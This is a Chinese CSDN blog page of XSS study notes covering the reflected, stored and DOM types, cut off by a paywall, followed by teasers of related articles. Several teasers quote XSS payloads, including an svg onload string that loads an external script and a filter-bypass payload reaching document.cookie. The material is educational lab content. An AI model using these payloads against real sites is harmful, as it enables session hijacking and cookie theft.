XSS学习笔记

最新推荐文章于 2024-09-27 06:00:00 发布
最新推荐文章于 2024-09-27 06:00:00 发布
阅读量596 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47599604/article/details/114937275
版权
本文详细介绍了XSS(跨站脚本攻击)的概念、分类、形成原因、危害及各种类型的区别。反射型、存储型和DOM型XSS通过不同的方式触发,可能导致钓鱼欺骗、身份盗用和网站挂马等安全问题。XSS靶场实战展示了如何检测和利用这些漏洞,包括BeEF框架的使用。最后,文章讨论了XSS的防御措施,如输入检查、输出检查和HttpOnly属性的使用。
摘要由CSDN通过智能技术生成

  • XSS介绍以及分类

  • XSS介绍

XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。

  • 分类

反射型(非持久型):

攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。

存储型(持久型):

payload被存储到数据库中,每次只要访问就可以被触发。

DOM型:

DOM型XSS漏洞是基于文档对象模型document object model的漏洞。

  • 形成

由于程序员在编写代码时,未对用户输入的数据进行处理,或者处理不当,从而导致恶意payload代码被执行。

  • 各种类型的区别

XSS类型 存储型 反射型 DOM型
触发过程

1.黑客构造XSS脚本

2.正常用户访问携带XSS脚本的页面

 正常用户访问携带XSS脚本的URL 正常用户访问携带XSS脚本的URL
数据存储 数据库 URL url
谁来输出 后端web应用程序 后端web应用程序 前端javascript
输出位置 HTTP响应中 HTTP响应中 动态构造的DOM节点

最低0.47元/天 解锁文章
xiao9105
关注
通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4094
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA xss
qq_44159634的博客
12-12 701
DVWA中的XSS 参考文章: http://blog.nsfocus.net/xss-advance/ XSS分类: 反射型xss与存储型xss的区别主要在于,存储型xss是要存储在数据库中,然后从数据库中调用的 反射型xss low 直接输入<script>alert(1)</script>后,直接弹窗,查看源代码,发现直接注入进去了 medium 和low一样输入,发现不弹窗,回显 查看源码,发现 ...
xss漏洞,弹不了窗
山兔的博客
05-14 1154
xss漏洞弹不了窗,我们可以试着去获取cookie,或者插入图片
XSS | 反射型 XSS 攻击
最新发布
Blue17 の 小窝
09-27 1794
当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有 XSS 代码的数据发送给目标用户的浏览器,浏览器解析这段带有 XSS 代码的恶意脚本后,就会触发 XSS 攻击。为了方便演示,笔者给 2.0 还是设置了弹窗(保留了弹窗功能才让你知道你被攻击了),点击了弹窗的确认后,会弹出啥,笔者这里就不截图了,怕过不了审,留给读者自己摸索吧。此时,有宝子又会说,你这太明显了,点了 ”确定“ 后又是一个 404 Not Found,而且 URL 这么怪,是个人都能发现这个链接有猫腻,马上举报!
xss绕过及防护
xiaoheizi的博客
06-29 862
CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它是后端服务器对cookie设置的一个附加的属性,如果在生成cookie时使用HttpOnly,那么通过js脚本将无法读取到cookie信息,这样能有效的防止xss攻击。页面显示被过滤了尖括号,但是url没有被过滤,闭合input标签输入:">alert("xss")即可弹窗。在网站代码文件中配置:只会在当前代码文件中生效,攻击者无法在该代码文件中获取 cookie。
【安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 394
目录0X01 XSS漏洞介绍0X02 反射型XSS0X03 存储型XSS0X04 DOM型XSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射型XSS 反射型XSS又称非持久性XSS,这种攻击
XSS 学习笔记(源码分析)
jieli0901227的博客
11-30 873
XSS
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 502
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
XSS学习笔记(二)(存储型XSS,持久型攻击)
热门推荐
byteway的专栏
04-20 1万+
持久型XSS攻击就是把攻击数据存进数据库,攻击行为就伴随着攻击数据一直存在,下面找来一个利用持久型攻击获取Session ID,同时向浏览器传送一个cookie,(这里科普一下,即使是使用了session验证的方法,还是需要客户端支持cookie), cookie会保存会话连接中的数据,Session ID作为会话标识,浏览器的后续请求就会基于后续请求,攻击者可以提供一个攻击链接,用户点击该链接时
XSS原理与解析
qq_45300786的博客
08-18 435
简单来说就是用cookie来登录。 证明存在XSS,一般打弹窗()或者直接窃取cookie(标签触发,不用点击) 第二种方法就是通过伪协议来证明XSS,http:// ftp://(伪协议触发,需要点击,有点类似于链接,需要点击才会跳转,所以才会触发) ...
XSS解析
wuyajun1124的专栏
11-30 610
XSS 全称(Cross Site Scripting) 跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。比如获取用户的Cookie,导航到恶意网站,携带木马等。 XSS 是如何发生的呢 假如有下面一个textbox input type="text" nam
XSS绕过姿势总结
nigo134的博客
07-16 1847
0x00 XSS基本测试流程 原则是“见框就插”,多动手,这里分享几个经典测试payload: "><svg/onload=alert(1)// 具体引用外部js的代码姿势是: <svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'// 在火狐浏览器下查看的效果(浏览器解析时会自动加上引号): <a href="javascript:alert(1)" >click me
DVWAXSS
qq_39670065的博客
08-08 397
Reflected Cross Site Scripting (XSS) low 直接尝试<script>alert('xss')</script> 弹窗成功 medium 还是先尝试<script>alert('xss')</script> 发现并没有弹窗但页面显示了Hello alert('xss') 猜测是<script>被删除 看波源码 <?php header ("X-XSS-Protection: 0"); // Is th
Pikachu---XSS
从不专注的人的博客
07-07 254
XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3567
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4968
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
【无标题】xss短域名绕过字符长度限制以及执行弹窗的原理
m0_52813136的博客
07-26 744
XSS短域名绕过及弹窗的原理
XSS攻击测试代码
mayanyun2013的专栏
11-28 4919
XSS攻击测试代码 主要攻击是通过在输入框内输入获取服务器的cookie的信息,从而登陆你的服务器, 原理是通过在前端的关键字内输入攻击的值,然后这些值存储在数据库内,后端服务器通过调取这个键值对,从而触发获取服务器端的cookie信息。 所以前后端要进行特殊字符的处理,不让输入一些特殊标签,如&lt;script&gt;,HTML等代码标签或者特殊字符 1.获取用户的cookie &l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值